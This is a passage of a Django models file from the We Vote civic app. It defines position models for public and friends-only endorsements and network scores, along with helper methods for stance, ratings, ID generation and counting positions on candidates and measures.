statement_text = models.TextField(null=True, blank=True) # Would be better with db_index=True, but overflows index
statement_html = models.TextField(null=True, blank=True)
# A link to any location with more information about this position
more_info_url = models.URLField(blank=True, null=True, verbose_name='url with more info about this position')
# Did this position come from a web scraper?
from_scraper = models.BooleanField(default=False)
# Was this position certified by an official with the organization?
organization_certified = models.BooleanField(default=False)
# Was this position certified by an official We Vote volunteer?
volunteer_certified = models.BooleanField(default=False)
# link = models.URLField(null=True, blank=True,)
# link_title = models.TextField(null=True, blank=True, max_length=128)
# link_site = models.TextField(null=True, blank=True, max_length=64)
# link_txt = models.TextField(null=True, blank=True)
# link_img = models.URLField(null=True, blank=True)
# Set this to True after getting all the link details (title, txt, img etc)
# details_loaded = models.BooleanField(default=False)
# video_embed = models.URLField(null=True, blank=True)
# spam_flag = models.BooleanField(default=False)
# abuse_flag = models.BooleanField(default=False)
# orig_json = models.TextField(blank=True)
def __unicode__(self):
return self.stance
class Meta:
ordering = ('date_entered',)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this organization came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
self.generate_new_we_vote_id()
super(PositionEntered, self).save(*args, **kwargs)
def generate_new_we_vote_id(self):
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_position_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "pos" = tells us this is a unique id for an pos
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}pos{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
# TODO we need to deal with the situation where we_vote_id is NOT unique on save
return
def get_kind_of_ballot_item(self):
if positive_value_exists(self.candidate_campaign_we_vote_id):
return "CANDIDATE"
elif positive_value_exists(self.contest_measure_we_vote_id):
return "MEASURE"
elif positive_value_exists(self.contest_office_we_vote_id):
return "OFFICE"
return ""
def get_ballot_item_id(self):
if positive_value_exists(self.candidate_campaign_id):
return self.candidate_campaign_id
elif positive_value_exists(self.contest_measure_id):
return self.contest_measure_id
return ""
def get_ballot_item_we_vote_id(self):
if positive_value_exists(self.candidate_campaign_we_vote_id):
return self.candidate_campaign_we_vote_id
elif positive_value_exists(self.contest_measure_we_vote_id):
return self.contest_measure_we_vote_id
return ""
# Is the position is an actual endorsement?
def is_support(self):
if self.stance == SUPPORT:
return True
return False
# Is the position a rating that is 66% or greater?
def is_positive_rating(self):
if self.stance == PERCENT_RATING:
if self.vote_smart_rating:
rating_percentage = convert_to_int(self.vote_smart_rating)
if rating_percentage >= 66:
return True
return False
# Is the position is an actual endorsement or a rating that is 66% or greater?
def is_support_or_positive_rating(self):
if self.is_support():
return True
elif self.is_positive_rating():
return True
return False
# Is the position an anti-endorsement?
def is_oppose(self):
if self.stance == OPPOSE:
return True
return False
# Is the position a rating that is 33% or less?
def is_negative_rating(self):
if self.stance == PERCENT_RATING:
if self.vote_smart_rating:
rating_percentage = convert_to_int(self.vote_smart_rating)
if rating_percentage <= 33:
return True
return False
# Is the position is an actual endorsement or a rating that is 66% or greater?
def is_oppose_or_negative_rating(self):
if self.is_oppose():
return True
elif self.is_negative_rating():
return True
return False
def is_no_stance(self):
"""
"is_no_stance" means that they may have a position, but we don't know the stance -- its not in the database
DALE 2016-8-29 We will want to deprecate NO_STANCE and replace with INFORMATION_ONLY
:return:
"""
if self.stance == NO_STANCE:
return True
elif self.stance == PERCENT_RATING:
if self.vote_smart_rating:
rating_percentage = convert_to_int(self.vote_smart_rating)
if (rating_percentage > 33) and (rating_percentage < 66):
return True
return False
def is_information_only(self):
"""
"information_only" means that they are not taking a support/oppose position
:return:
"""
if self.stance == INFORMATION_ONLY:
return True
if positive_value_exists(self.statement_text) or positive_value_exists(self.statement_html):
# If there is a text description, and no SUPPORT or OPPOSE, then it is INFORMATION_ONLY
if self.stance != OPPOSE and self.stance != SUPPORT and self.stance != STILL_DECIDING \
and self.stance != PERCENT_RATING:
return True
return False
def is_still_deciding(self):
if self.stance == STILL_DECIDING:
return True
return False
def is_friends_only_position(self):
return False
def is_public_position(self):
return True
def last_updated(self):
if positive_value_exists(self.date_last_changed):
return str(self.date_last_changed)
elif positive_value_exists(self.date_entered):
return str(self.date_entered)
return ''
def candidate_campaign(self):
if not self.candidate_campaign_id:
return
try:
candidate_campaign = CandidateCampaign.objects.get(id=self.candidate_campaign_id)
except CandidateCampaign.MultipleObjectsReturned as e:
logger.error("position.candidate_campaign Found multiple")
return
except CandidateCampaign.DoesNotExist:
return
return candidate_campaign
def contest_measure(self):
if not self.contest_measure_id:
return
try:
contest_measure = ContestMeasure.objects.get(id=self.contest_measure_id)
except ContestMeasure.MultipleObjectsReturned as e:
logger.error("position.contest_measure Found multiple")
return
except ContestMeasure.DoesNotExist:
return
return contest_measure
def election(self):
if not self.google_civic_election_id:
return
try:
election = Election.objects.get(google_civic_election_id=self.google_civic_election_id)
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("position.election Found multiple")
return
except Election.DoesNotExist:
return
return election
def organization(self):
if not self.organization_id:
return
try:
organization = Organization.objects.get(id=self.organization_id)
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("position.organization Found multiple")
return
except Organization.DoesNotExist:
return
return organization
def voter(self):
if not self.voter_we_vote_id:
return
try:
voter = Voter.objects.get(we_vote_id=self.voter_we_vote_id)
except Voter.MultipleObjectsReturned as e:
return
except Voter.DoesNotExist:
return
return voter
class PositionForFriends(models.Model):
"""
Any position intended for friends only that is entered by any organization or candidate gets its own
PositionForFriends entry.
NOTE: We also have PositionEntered table that is exactly the same structure as PositionForFriends. It holds
opinions that voters only want to share with friends.
"""
# We are relying on built-in Python id field
# The we_vote_id identifier is unique across all We Vote sites, and allows us to share our org info with other
# organizations
# It starts with "wv" then we add on a database specific identifier like "3v" (WeVoteSetting.site_unique_id_prefix)
# then the string "pos", and then a sequential integer like "123".
# We keep the last value in WeVoteSetting.we_vote_id_last_position_integer
we_vote_id = models.CharField(
verbose_name="we vote permanent id", max_length=255, default=None, null=True, blank=True, unique=True)
# The id for the generated position that this PositionForFriends entry influences
position_id = models.BigIntegerField(null=True, blank=True) # NOT USED CURRENTLY
test = models.BigIntegerField(null=True, blank=True)
ballot_item_display_name = models.CharField(verbose_name="text name for ballot item",
max_length=255, null=True, blank=True, db_index=True)
# We cache the url to an image for the candidate, measure or office for rapid display
ballot_item_image_url_https = models.URLField(
verbose_name='url of https image for candidate, measure or office',
blank=True, null=True)
ballot_item_image_url_https_large = models.URLField(verbose_name='url of https large version image for candidate,'
' measure or office', blank=True, null=True)
ballot_item_image_url_https_medium = models.URLField(verbose_name='url of https medium version image for candidate,'
' measure or office', blank=True, null=True)
ballot_item_image_url_https_tiny = models.URLField(verbose_name='url of https tiny version image for candidate,'
' measure or office', blank=True, null=True)
ballot_item_twitter_handle = models.CharField(
verbose_name='twitter screen_name for candidate, measure, or office',
max_length=255, null=True, unique=False)
# What is the organization name, voter name, or public figure name? We cache this here for rapid display
speaker_display_name = models.CharField(
verbose_name="name of the org or person with position", max_length=255, null=True, blank=True, unique=False)
# We cache the url to an image for the org, voter, or public_figure for rapid display
speaker_image_url_https = models.URLField(verbose_name='url of https image for org or person with position',
blank=True, null=True)
speaker_image_url_https_large = models.URLField(verbose_name='url of https large version image for org or '
'person with position', blank=True, null=True)
speaker_image_url_https_medium = models.URLField(verbose_name='url of https medium version image for org or '
'person with position', blank=True, null=True)
speaker_image_url_https_tiny = models.URLField(verbose_name='url of https tiny version image for org or '
'person with position', blank=True, null=True)
speaker_twitter_handle = models.CharField(verbose_name='twitter screen_name for org or person with position',
max_length=255, null=True, unique=False)
date_entered = models.DateTimeField(verbose_name='date entered', null=True, auto_now=True, db_index=True)
# The date the this position last changed
date_last_changed = models.DateTimeField(verbose_name='date last changed', null=True, auto_now=True)
# The organization this position was taken by
organization_id = models.BigIntegerField(null=True, blank=True, db_index=True)
organization_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the organization", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The voter expressing the opinion
# Note that for organizations who have friends, the voter_we_vote_id is what we use to link to the friends.
# Public positions from an organization are shared via organization_we_vote_id (in PositionEntered table), while
# friend's-only positions are shared via voter_we_vote_id.
voter_id = models.BigIntegerField(null=True, blank=True, db_index=True)
voter_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the voter expressing the opinion", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The unique id of the public figure expressing the opinion. May be null if position is from org or voter
# instead of public figure.
public_figure_we_vote_id = models.CharField(
verbose_name="public figure we vote id", max_length=255, null=True, blank=True, unique=False)
# The unique ID of the election containing this contest. (Provided by Google Civic)
google_civic_election_id = models.PositiveIntegerField(
verbose_name="google civic election id", default=0, null=True, blank=True, db_index=True)
state_code = models.CharField(verbose_name="us state of the ballot item position is for", max_length=2,
null=True, blank=True)
# ### Values from Vote Smart ###
vote_smart_rating_id = models.BigIntegerField(null=True, blank=True, unique=False)
# Usually in one of these two formats 2015, 2014-2015
vote_smart_time_span = models.CharField(
verbose_name="the period in which the organization stated this position", max_length=255, null=True,
blank=True, unique=False)
vote_smart_rating = models.CharField(
verbose_name="vote smart value between 0-100", max_length=255, null=True,
blank=True, unique=False)
vote_smart_rating_integer = models.PositiveIntegerField(
verbose_name="vote smart value between 0-100", default=None, null=True, blank=True)
vote_smart_rating_name = models.CharField(max_length=255, null=True, blank=True, unique=False)
# The unique We Vote id of the tweet that is the source of the position
tweet_source_id = models.BigIntegerField(null=True, blank=True)
# This is the voter / authenticated user who entered the position for an organization
# (NOT the voter expressing opinion)
voter_entering_position = models.ForeignKey(
Voter, verbose_name='authenticated user who entered position', null=True, blank=True)
# The Twitter user account that generated this position
twitter_user_entered_position = models.ForeignKey(TwitterUser, null=True, verbose_name='')
# This is the office that the position refers to.
# Either contest_measure is filled, contest_office OR candidate_campaign, but not all three
contest_office_id = models.BigIntegerField(verbose_name='id of contest_office',
null=True, blank=True, db_index=True)
contest_office_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the contest_office", max_length=255, null=True, blank=True,
unique=False, db_index=True)
contest_office_name = models.CharField(verbose_name="name of the office", max_length=255, null=True, blank=True)
# This is the candidate/politician that the position refers to.
# Either candidate_campaign is filled, contest_office OR contest_measure, but not all three
candidate_campaign_id = models.BigIntegerField(verbose_name='id of candidate_campaign',
null=True, blank=True, db_index=True)
candidate_campaign_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the candidate_campaign", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The candidate's name as passed over by Google Civic. We save this so we can match to this candidate if an import
# doesn't include a we_vote_id we recognize.
google_civic_candidate_name = models.CharField(
verbose_name="candidate name exactly as received from google civic",
max_length=255, null=True, blank=True)
# Useful for queries based on Politicians -- not the main table we use for ballot display though
politician_id = models.BigIntegerField(verbose_name='', null=True, blank=True)
politician_we_vote_id = models.CharField(
verbose_name="we vote permanent id for politician", max_length=255, null=True,
blank=True, unique=False)
political_party = models.CharField(verbose_name="candidate political party", max_length=255, null=True)
# This is the measure/initiative/proposition that the position refers to.
# Either contest_measure is filled, contest_office OR candidate_campaign, but not all three
contest_measure_id = models.BigIntegerField(verbose_name='id of contest_measure',
null=True, blank=True, db_index=True)
contest_measure_we_vote_id = models.CharField(
verbose_name="we vote permanent id for the contest_measure", max_length=255, null=True,
blank=True, unique=False, db_index=True)
# The measure's title as passed over by Google Civic. We save this so we can match to this measure if an import
# doesn't include a we_vote_id we recognize.
google_civic_measure_title = models.CharField(verbose_name="measure title exactly as received from google civic",
max_length=255, null=True, blank=True)
# Strategic denormalization - this is redundant but will make generating the voter guide easier.
# geo = models.ForeignKey(Geo, null=True, related_name='pos_geo')
# issue = models.ForeignKey(Issue, null=True, blank=True, related_name='')
# supporting/opposing
stance = models.CharField(max_length=15, choices=POSITION_CHOICES, default=NO_STANCE, db_index=True)
statement_text = models.TextField(null=True, blank=True) # Would be better with db_index=True, but overflows index
statement_html = models.TextField(null=True, blank=True)
# A link to any location with more information about this position
more_info_url = models.URLField(blank=True, null=True, verbose_name='url with more info about this position')
# Did this position come from a web scraper?
from_scraper = models.BooleanField(default=False)
# Was this position certified by an official with the organization?
organization_certified = models.BooleanField(default=False)
# Was this position certified by an official We Vote volunteer?
volunteer_certified = models.BooleanField(default=False)
# link = models.URLField(null=True, blank=True,)
# link_title = models.TextField(null=True, blank=True, max_length=128)
# link_site = models.TextField(null=True, blank=True, max_length=64)
# link_txt = models.TextField(null=True, blank=True)
# link_img = models.URLField(null=True, blank=True)
# Set this to True after getting all the link details (title, txt, img etc)
# details_loaded = models.BooleanField(default=False)
# video_embed = models.URLField(null=True, blank=True)
# spam_flag = models.BooleanField(default=False)
# abuse_flag = models.BooleanField(default=False)
# orig_json = models.TextField(blank=True)
def __unicode__(self):
return self.stance
class Meta:
ordering = ('date_entered',)
# We override the save function so we can auto-generate we_vote_id
def save(self, *args, **kwargs):
# Even if this organization came from another source we still need a unique we_vote_id
if self.we_vote_id:
self.we_vote_id = self.we_vote_id.strip().lower()
if self.we_vote_id == "" or self.we_vote_id is None: # If there isn't a value...
self.generate_new_we_vote_id()
super(PositionForFriends, self).save(*args, **kwargs)
def generate_new_we_vote_id(self):
# ...generate a new id
site_unique_id_prefix = fetch_site_unique_id_prefix()
next_local_integer = fetch_next_we_vote_id_position_integer()
# "wv" = We Vote
# site_unique_id_prefix = a generated (or assigned) unique id for one server running We Vote
# "pos" = tells us this is a unique id for an pos
# next_integer = a unique, sequential integer for this server - not necessarily tied to database id
self.we_vote_id = "wv{site_unique_id_prefix}pos{next_integer}".format(
site_unique_id_prefix=site_unique_id_prefix,
next_integer=next_local_integer,
)
# TODO we need to deal with the situation where we_vote_id is NOT unique on save
return
def get_kind_of_ballot_item(self):
if positive_value_exists(self.candidate_campaign_we_vote_id):
return "CANDIDATE"
elif positive_value_exists(self.contest_measure_we_vote_id):
return "MEASURE"
elif positive_value_exists(self.contest_office_we_vote_id):
return "OFFICE"
return ""
def get_ballot_item_id(self):
if positive_value_exists(self.candidate_campaign_id):
return self.candidate_campaign_id
elif positive_value_exists(self.contest_measure_id):
return self.contest_measure_id
return ""
def get_ballot_item_we_vote_id(self):
if positive_value_exists(self.candidate_campaign_we_vote_id):
return self.candidate_campaign_we_vote_id
elif positive_value_exists(self.contest_measure_we_vote_id):
return self.contest_measure_we_vote_id
return ""
# Is the position is an actual endorsement?
def is_support(self):
if self.stance == SUPPORT:
return True
return False
# Is the position a rating that is 66% or greater?
def is_positive_rating(self):
if self.stance == PERCENT_RATING:
if self.vote_smart_rating:
rating_percentage = convert_to_int(self.vote_smart_rating)
if rating_percentage >= 66:
return True
return False
# Is the position is an actual endorsement or a rating that is 66% or greater?
def is_support_or_positive_rating(self):
if self.is_support():
return True
elif self.is_positive_rating():
return True
return False
# Is the position an anti-endorsement?
def is_oppose(self):
if self.stance == OPPOSE:
return True
return False
# Is the position a rating that is 33% or less?
def is_negative_rating(self):
if self.stance == PERCENT_RATING:
if self.vote_smart_rating:
rating_percentage = convert_to_int(self.vote_smart_rating)
if rating_percentage <= 33:
return True
return False
# Is the position is an actual endorsement or a rating that is 66% or greater?
def is_oppose_or_negative_rating(self):
if self.is_oppose():
return True
elif self.is_negative_rating():
return True
return False
def is_no_stance(self):
"""
"is_no_stance" means that they may have a position, but we don't know the stance -- its not in the database
DALE 2016-8-29 We will want to deprecate NO_STANCE and replace with INFORMATION_ONLY
:return:
"""
if self.stance == NO_STANCE:
return True
elif self.stance == PERCENT_RATING:
if self.vote_smart_rating:
rating_percentage = convert_to_int(self.vote_smart_rating)
if (rating_percentage > 33) and (rating_percentage < 66):
return True
return False
def is_information_only(self):
"""
"information_only" means that they are not taking a support/oppose position
:return:
"""
if self.stance == INFORMATION_ONLY:
return True
if positive_value_exists(self.statement_text) or positive_value_exists(self.statement_html):
# If there is a text description, and no SUPPORT or OPPOSE, then it is INFORMATION_ONLY
if self.stance != OPPOSE and self.stance != SUPPORT and self.stance != STILL_DECIDING \
and self.stance != PERCENT_RATING:
return True
return False
def is_still_deciding(self):
if self.stance == STILL_DECIDING:
return True
return False
def is_friends_only_position(self):
return True
def is_public_position(self):
return False
def last_updated(self):
if positive_value_exists(self.date_last_changed):
return str(self.date_last_changed)
elif positive_value_exists(self.date_entered):
return str(self.date_entered)
return ''
def candidate_campaign(self):
if not self.candidate_campaign_id:
return
try:
candidate_campaign = CandidateCampaign.objects.get(id=self.candidate_campaign_id)
except CandidateCampaign.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("position.candidate_campaign Found multiple")
return
except CandidateCampaign.DoesNotExist:
return
return candidate_campaign
def contest_measure(self):
if not self.contest_measure_id:
return
try:
contest_measure = ContestMeasure.objects.get(id=self.contest_measure_id)
except ContestMeasure.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("position.candidate_campaign Found multiple")
return
except ContestMeasure.DoesNotExist:
return
return contest_measure
def election(self):
if not self.google_civic_election_id:
return
try:
election = Election.objects.get(google_civic_election_id=self.google_civic_election_id)
except Election.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("position.election Found multiple")
return
except Election.DoesNotExist:
return
return election
def organization(self):
if not self.organization_id:
return
try:
organization = Organization.objects.get(id=self.organization_id)
except Organization.MultipleObjectsReturned as e:
handle_record_found_more_than_one_exception(e, logger=logger)
logger.error("position.organization Found multiple")
return
except Organization.DoesNotExist:
return
return organization
def voter(self):
if not self.voter_we_vote_id:
return
try:
voter = Voter.objects.get(we_vote_id=self.voter_we_vote_id)
except Voter.MultipleObjectsReturned as e:
return
except Voter.DoesNotExist:
return
return voter
class PositionNetworkScore(models.Model):
"""
Built for rapid lookup of the number of support / oppose for one ballot item, coming from one voter's network
"""
# We are relying on built-in Python id field
viewing_voter_id = models.PositiveIntegerField(null=False, unique=False, db_index=True)
viewing_voter_we_vote_id = models.CharField(max_length=255, null=False, unique=False, db_index=True)
google_civic_election_id = models.PositiveIntegerField(
verbose_name="google civic election id", default=None, null=True, blank=True, db_index=True)
# The organization that took this position (either organization or friend will have value, or both)
organization_we_vote_id = models.CharField(max_length=255, null=True, unique=False)
# The friend who took this position
friend_voter_we_vote_id = models.CharField(max_length=255, null=True, unique=False)
# The candidate this score is about (either candidate or measure will have a value, but not both)
candidate_we_vote_id = models.CharField(max_length=255, null=True, unique=False, db_index=True)
# The measure this score is about (either candidate or measure will have a value, but not both)
measure_we_vote_id = models.CharField(max_length=255, null=True, unique=False, db_index=True)
# What is the organization name, voter name, or public figure name? We cache this here for rapid display
speaker_display_name = models.CharField(
verbose_name="name of the org or person with position", max_length=255, null=True, blank=True, unique=False)
is_support = models.BooleanField(default=False)
is_oppose = models.BooleanField(default=False)
def get_ballot_item_we_vote_id(self):
if positive_value_exists(self.candidate_we_vote_id):
return self.candidate_we_vote_id
elif positive_value_exists(self.measure_we_vote_id):
return self.measure_we_vote_id
return ""
def get_speaker_we_vote_id(self):
if positive_value_exists(self.organization_we_vote_id):
return self.organization_we_vote_id
elif positive_value_exists(self.friend_voter_we_vote_id):
return self.friend_voter_we_vote_id
return ""
class PositionListManager(models.Model):
# 2018-05 We now have an "is_public_position()" function
# def add_is_public_position(self, incoming_position_list, is_public_position):
# outgoing_position_list = []
# for one_position in incoming_position_list:
# one_position.is_public_position = is_public_position
# outgoing_position_list.append(one_position)
#
# return outgoing_position_list
def calculate_positions_followed_by_voter(
self, voter_id, all_positions_list, organizations_followed_by_voter_by_id, voter_friend_list=[]):
"""
We need a list of positions that were made by an organization, public figure or friend that this voter follows
:param voter_id:
:param all_positions_list:
:param organizations_followed_by_voter_by_id:
:param voter_friend_list:
:return:
"""
positions_followed_by_voter = []
# Only return the positions if they are from organizations the voter follows
for position in all_positions_list:
if position.voter_id == voter_id: # We include the voter currently viewing the ballot in this list
positions_followed_by_voter.append(position)
elif position.voter_we_vote_id in voter_friend_list:
positions_followed_by_voter.append(position)
elif position.organization_id in organizations_followed_by_voter_by_id:
positions_followed_by_voter.append(position)
return positions_followed_by_voter
def calculate_positions_not_followed_by_voter(
self, all_positions_list, organizations_followed_by_voter, voter_friend_list=[]):
"""
We need a list of positions that were NOT made by an organization, public figure or friend
that this voter follows
:param all_positions_list:
:param organizations_followed_by_voter:
:param voter_friend_list:
:return:
"""
positions_not_followed_by_voter = []
# Only return the positions if they are from organizations the voter follows
for position in all_positions_list:
# Some positions are for individual voters, so we want to filter those out
if position.organization_id \
and position.organization_id in organizations_followed_by_voter:
# Do not add
pass
elif position.voter_we_vote_id \
and position.voter_we_vote_id in voter_friend_list:
# Do not add
pass
else:
positions_not_followed_by_voter.append(position)
return positions_not_followed_by_voter
def delete_all_position_network_scores_for_voter(
self, viewing_voter_id, viewing_voter_we_vote_id):
status = ""
success = True
position_network_score_deleted = False
if not positive_value_exists(viewing_voter_id) and not positive_value_exists(viewing_voter_we_vote_id):
success = False
status += "DELETE_ALL_POSITION_NETWORK_SCORES-MISSING_VOTER_IDS "
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
try:
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_id=viewing_voter_id)
score_queryset.delete()
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_we_vote_id=viewing_voter_we_vote_id)
score_queryset.delete()
position_network_score_deleted = True
status += 'ALL_POSITION_NETWORK_SCORES_DELETED '
success = True
except Exception as e:
status += 'FAILED delete_all_position_network_scores_for_voter ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(status, logger=logger)
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
def delete_position_network_scores_for_voter_one_ballot_item(
self, viewing_voter_id, viewing_voter_we_vote_id,
candidate_we_vote_id, measure_we_vote_id):
status = ""
success = True
position_network_score_deleted = False
if not positive_value_exists(viewing_voter_id) and not positive_value_exists(viewing_voter_we_vote_id):
success = False
status += "DELETE_POSITION_NETWORK_SCORES-MISSING_VOTER_IDS "
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
try:
if positive_value_exists(candidate_we_vote_id):
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_id=viewing_voter_id)
score_queryset = score_queryset.filter(candidate_we_vote_id=candidate_we_vote_id)
score_queryset.delete()
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_we_vote_id=viewing_voter_we_vote_id)
score_queryset = score_queryset.filter(candidate_we_vote_id=candidate_we_vote_id)
score_queryset.delete()
position_network_score_deleted = True
status += 'POSITION_NETWORK_SCORES_DELETED '
success = True
elif positive_value_exists(measure_we_vote_id):
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_id=viewing_voter_id)
score_queryset = score_queryset.filter(measure_we_vote_id=measure_we_vote_id)
score_queryset.delete()
score_queryset = PositionNetworkScore.objects.filter(viewing_voter_we_vote_id=viewing_voter_we_vote_id)
score_queryset = score_queryset.filter(measure_we_vote_id=measure_we_vote_id)
score_queryset.delete()
position_network_score_deleted = True
status += 'POSITION_NETWORK_SCORES_DELETED '
success = True
else:
status += 'POSITION_NETWORK_SCORES_NOT_DELETED-MISSING_CANDIDATE_AND_MEASURE '
success = False
except Exception as e:
status += 'FAILED delete_position_network_scores_for_voter_one_ballot_item ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(status, logger=logger)
results = {
'success': success,
'status': status,
'voter_id': viewing_voter_id,
'voter_we_vote_id': viewing_voter_we_vote_id,
'position_network_score_deleted': position_network_score_deleted,
}
return results
def fetch_voter_positions_count_for_candidate_campaign(
self, candidate_campaign_id, candidate_campaign_we_vote_id='', stance_we_are_looking_for=ANY_STANCE):
"""
We are only retrieving voter positions, not positions of organizations.
:param candidate_campaign_id:
:param candidate_campaign_we_vote_id:
:param stance_we_are_looking_for:
:return:
"""
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
return 0
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(candidate_campaign_id) and not \
positive_value_exists(candidate_campaign_we_vote_id):
return 0
# Retrieve the support positions for this candidate_campaign
total_count = 0
# Public Positions
try:
public_position_list = PositionEntered.objects.using('readonly').all()
public_position_list = public_position_list.exclude(voter_we_vote_id=None) # Don't include if no we_vote_id
# As of Aug 2018 we are no longer using PERCENT_RATING
public_position_list = public_position_list.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(candidate_campaign_id):
public_position_list = public_position_list.filter(candidate_campaign_id=candidate_campaign_id)
else:
public_position_list = public_position_list.filter(
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# public_position_list = public_position_list.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING)) # | Q(stance=GRADE_RATING))
# else:
# public_position_list = public_position_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
public_position_list = public_position_list.filter(stance__iexact=stance_we_are_looking_for)
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
revised_public_position_list = []
for one_position in public_position_list:
if stance_we_are_looking_for == SUPPORT:
if one_position.stance == PERCENT_RATING:
if one_position.is_positive_rating(): # This was "is_support"
revised_public_position_list.append(one_position)
else:
revised_public_position_list.append(one_position)
elif stance_we_are_looking_for == OPPOSE:
if one_position.stance == PERCENT_RATING:
if one_position.is_negative_rating(): # This was "is_oppose"
revised_public_position_list.append(one_position)
else:
revised_public_position_list.append(one_position)
public_position_list = revised_public_position_list
total_count += len(public_position_list)
except Exception as e:
pass
# Friends-only Positions
try:
friends_only_position_list = PositionForFriends.objects.using('readonly').all()
friends_only_position_list = friends_only_position_list.exclude(voter_we_vote_id=None) # No we_vote_id
# As of Aug 2018 we are no longer using PERCENT_RATING
friends_only_position_list = friends_only_position_list.exclude(stance__iexact='PERCENT_RATING')
if positive_value_exists(candidate_campaign_id):
friends_only_position_list = friends_only_position_list.filter(
candidate_campaign_id=candidate_campaign_id)
else:
friends_only_position_list = friends_only_position_list.filter(
candidate_campaign_we_vote_id__iexact=candidate_campaign_we_vote_id)
# SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING
# if stance_we_are_looking_for != ANY_STANCE:
# # If we passed in the stance "ANY_STANCE" it means we want to not filter down the list
# if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
# friends_only_position_list = friends_only_position_list.filter(
# Q(stance=stance_we_are_looking_for) | Q(stance=PERCENT_RATING)) # | Q(stance=GRADE_RATING))
# else:
# friends_only_position_list = friends_only_position_list.filter(stance=stance_we_are_looking_for)
if stance_we_are_looking_for != ANY_STANCE:
friends_only_position_list = friends_only_position_list.filter(stance__iexact=stance_we_are_looking_for)
# Now filter out the positions that have a percent rating that doesn't match the stance_we_are_looking_for
if stance_we_are_looking_for == SUPPORT or stance_we_are_looking_for == OPPOSE:
revised_friends_only_position_list = []
for one_position in friends_only_position_list:
if stance_we_are_looking_for == SUPPORT:
if one_position.stance == PERCENT_RATING:
if one_position.is_positive_rating(): # This was "is_support"
revised_friends_only_position_list.append(one_position)
else:
revised_friends_only_position_list.append(one_position)
elif stance_we_are_looking_for == OPPOSE:
if one_position.stance == PERCENT_RATING:
if one_position.is_negative_rating(): # This was "is_oppose"
revised_friends_only_position_list.append(one_position)
else:
revised_friends_only_position_list.append(one_position)
friends_only_position_list = revised_friends_only_position_list
total_count += len(friends_only_position_list)
except Exception as e:
pass
return total_count
def fetch_voter_positions_count_for_contest_measure(
self, contest_measure_id, contest_measure_we_vote_id='', stance_we_are_looking_for=ANY_STANCE):
"""
We are only retrieving voter positions, not positions of organizations.
:param contest_measure_id:
:param contest_measure_we_vote_id:
:param stance_we_are_looking_for:
:return:
"""
if stance_we_are_looking_for not \
in(ANY_STANCE, SUPPORT, STILL_DECIDING, INFORMATION_ONLY, NO_STANCE, OPPOSE, PERCENT_RATING):
return 0
# Note that one of the incoming options for stance_we_are_looking_for is 'ANY_STANCE'
# which means we want to return all stances
if not positive_value_exists(contest_measure_id) and not \
positive_value_exists(contest_measure_we_vote_id):
return 0
# Retrieve the support positions for this contest_measure
total_count = 0
# Public Positions
try:
public_position_list = PositionEntered.objects.using('readonly').all()
public_position_list = public_position_list.exclude(voter_we_vote_id=None) # Don't include if no we_vote_id
# As of Aug 2018 we are no longer using PERCENT_RATING
public_position_list = public_position_list.exclude(stance__iexact=PERCENT_RATING)
if positive_value_exists(contest_measure_id):
public_position_list = public_position_list.filter(contest_measure_id=contest_measure_id)
else:
public_position_list = public_position_list.filter(
